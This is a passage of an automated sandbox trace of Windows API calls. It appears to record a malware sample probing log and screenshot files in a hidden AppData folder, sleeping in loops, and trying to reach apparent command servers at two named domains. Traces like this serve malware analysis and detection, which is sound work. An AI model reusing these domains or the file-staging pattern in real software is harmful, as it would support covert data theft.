HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.648] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.648] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.648] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.648] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0197.648] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.648] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.648] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.648] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0197.648] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3f0e1c0) returned 1 [0197.648] Sleep (dwMilliseconds=0x7d0) [0197.655] Sleep (dwMilliseconds=0x7d0) [0197.672] Sleep (dwMilliseconds=0x7d0) [0197.687] Sleep (dwMilliseconds=0x7d0) [0197.706] Sleep (dwMilliseconds=0x7d0) [0197.718] Sleep (dwMilliseconds=0x7d0) [0197.734] Sleep (dwMilliseconds=0x7d0) [0197.749] Sleep (dwMilliseconds=0x7d0) [0197.769] Sleep (dwMilliseconds=0x7d0) [0197.780] Sleep (dwMilliseconds=0x7d0) [0197.796] Sleep (dwMilliseconds=0x7d0) [0197.811] Sleep (dwMilliseconds=0x7d0) [0197.827] Sleep (dwMilliseconds=0x7d0) [0197.848] Sleep (dwMilliseconds=0x7d0) [0197.858] Sleep (dwMilliseconds=0x7d0) [0197.874] Sleep (dwMilliseconds=0x7d0) [0197.889] Sleep (dwMilliseconds=0x7d0) [0197.908] Sleep (dwMilliseconds=0x7d0) [0197.920] Sleep (dwMilliseconds=0x7d0) [0197.936] Sleep (dwMilliseconds=0x7d0) [0197.952] Sleep (dwMilliseconds=0x7d0) [0197.973] Sleep (dwMilliseconds=0x7d0) [0197.983] Sleep (dwMilliseconds=0x7d0) [0197.998] Sleep (dwMilliseconds=0x7d0) [0198.014] Sleep (dwMilliseconds=0x7d0) [0198.030] Sleep (dwMilliseconds=0x7d0) [0198.052] Sleep (dwMilliseconds=0x7d0) [0198.238] socket (af=2, type=1, protocol=6) returned 0xae8 [0198.239] getaddrinfo (in: pNodeName="www.interfaceprosthetics.com", pServiceName="80", pHints=0x6f0bb58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bb88 | out: ppResult=0x6f0bb88*=0x0) returned 11002 [0203.732] Sleep (dwMilliseconds=0x7d0) [0203.762] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.762] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.763] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0203.763] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.763] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.763] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.763] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.763] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.763] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.763] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.763] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.763] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.763] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.763] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.764] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.764] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.764] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.764] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.764] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.764] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.764] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.764] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.764] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.764] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.764] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.764] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.764] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.764] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.765] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.765] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.765] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.765] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.765] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x10 [0203.765] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472c40) returned 1 [0203.765] socket (af=2, type=1, protocol=6) returned 0x224 [0203.766] getaddrinfo (in: pNodeName="www.publicpod.net", pServiceName="80", pHints=0x6f0bef8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bf28 | out: ppResult=0x6f0bf28*=0x0) returned 11001 [0203.804] Sleep (dwMilliseconds=0x7d0) [0203.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.817] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x10 [0203.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0203.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x10 [0203.819] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3e1c3a0) returned 1 [0203.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.819] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, 